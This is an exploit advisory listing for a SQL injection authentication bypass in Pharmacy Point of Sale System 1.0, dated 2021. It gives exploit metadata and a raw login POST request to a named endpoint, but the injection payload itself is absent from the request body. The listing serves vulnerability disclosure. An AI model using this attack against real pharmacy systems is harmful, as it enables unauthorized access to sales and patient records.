Pharmacy Point Of Sale System 1.0 SQL Injection

Pharmacy Point of Sale System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

MD5 | 0c421cadb58ed3860edd48c36da90815

# Exploit Title: Pharmacy Point of Sale System v1.0 - SQLi Authentication Bypass
# Date: 23.09.2021
# Exploit Author: Janik Wehrli
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Kali Linux, Windows 10

# Pharmacy Point of Sale System v1.0 Login can be bypassed with a simple SQLi

POST /pharmacy/Actions.php?a=login HTTP/1.1
Content-Length: 38
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: PHPSESSID=c5mtnqpcavhfgsambtnh4uklag
Connection: close


Related Posts